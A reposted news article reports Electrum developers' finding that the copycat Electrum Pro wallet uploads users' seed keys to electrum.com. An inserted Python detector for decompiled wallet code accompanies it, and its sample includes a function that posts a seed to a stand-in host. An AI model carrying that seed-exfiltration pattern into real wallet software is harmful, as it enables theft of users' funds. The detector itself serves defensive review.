
Bitcoin Wallet App Caught Stealing Seed Keys


The team behind Electrum, a Bitcoin wallet app, has exposed a copycat product named Electrum Pro as a malicious app that steals users' seed keys.

Electrum developers made their accusations in a document published on GitHub yesterday.

The document contains a step-by-step guide to decompiling a rival product named Electrum Pro that appeared online two months ago, in March.

Obvious copycat is obviously malicious

The Electrum team has long suspected that this is a scam product. The newly launched wallet app not only used their brand name without permission, it was also distributed from the registered electrum.com domain, which resembles the real Electrum domain, electrum.org, in an attempt to capitalize on the older app's reputation and trick users into using the copycat.

Now, Electrum devs seem to have confirmed their initial suspicions. On GitHub, the Electrum team points to a particular piece of code (lines 223-248 in electrumpro_keystore.py) where the Electrum Pro wallet appears to take the user's wallet seed key and upload it to the electrum.com domain.

Wallet seed keys are cryptographic keys that allow the owners of a wallet app to access the funds of multiple Bitcoin addresses stored in a particular wallet.

With the seed keys uploaded to electrum.com, the owners of that domain have the ability to use these seed keys and empty Bitcoin accounts.

According to Electrum devs, creating or restoring a wallet with Electrum Pro will send copies of the users' wallet seed keys to the electrum.com domain.
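When reviewing decompiled wallet source for the behaviour described above, one useful triage step is to flag every function where a seed-like variable is passed to a network call. The following is an added example, not code from the Electrum team's GitHub document or from Electrum Pro; the sample source, the `.invalid` URLs, the identifier lists and the function names are all assumptions made for illustration.

```python
import ast

# Assumed name hints for seed material and network sinks; extend per code base.
SECRET_HINTS = ("seed", "mnemonic", "passphrase")
NETWORK_MODULES = {"requests", "urllib", "urllib2", "httplib", "http", "socket"}

# Constructed sample standing in for decompiled wallet source; not Electrum Pro code.
SAMPLE = '''
import requests

def from_seed(seed, passphrase):
    keystore = {"type": "bip32", "seed": seed}
    return keystore

def restore_wallet(seed_text):
    requests.post("https://collector.invalid/api", data={"s": seed_text})
    return from_seed(seed_text, "")

def check_update():
    return requests.get("https://updates.invalid/version").text
'''

def _root_name(node):
    """Return the leftmost name of a dotted call target, e.g. 'requests'."""
    while isinstance(node, ast.Attribute):
        node = node.value
    return node.id if isinstance(node, ast.Name) else None

def _mentions_secret(node):
    """True if any variable name inside the node looks like seed material."""
    return any(isinstance(n, ast.Name) and any(h in n.id.lower() for h in SECRET_HINTS)
               for n in ast.walk(node))

def find_seed_leaks(source):
    """List (function, line) pairs where seed-like data is passed to a network call."""
    findings = []
    funcs = [n for n in ast.walk(ast.parse(source)) if isinstance(n, ast.FunctionDef)]
    for func in funcs:
        for call in ast.walk(func):
            if (isinstance(call, ast.Call)
                    and _root_name(call.func) in NETWORK_MODULES
                    and any(_mentions_secret(a) for a in
                            call.args + [k.value for k in call.keywords])):
                findings.append((func.name, call.lineno))
    return findings

if __name__ == "__main__":
    for name, line in find_seed_leaks(SAMPLE):
        print(f"{name}: seed-like value reaches a network call at line {line}")
```

The check is name-based, so a finding is a pointer for manual review; a seed copied into a neutrally named variable or sent through a wrapper function will not be caught.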

Seed key theft seen in Windows and macOS binaries

"We previously warned users against 'Electrum Pro', but we did not have formal evidence at that time," Electrum devs said.

Devs also said they've only analyzed Electrum Pro's "electrumpro-4.0.2.dmg" macOS binary and "ElectrumPro-4.0.2-Standalone.zip" Windows binary, but warned that "is safe to assume that the other Windows binaries are malicious as well."

Affected users should move funds from Bitcoin addresses they've managed via Electrum Pro. At the time of writing, there have not been any reports of stolen funds.

By Catalin Cimpanu, May 10, 2018, 12:30 AM

Posted by David Ogden Entrepreneur

Alan Zibluk Markethive Founding Member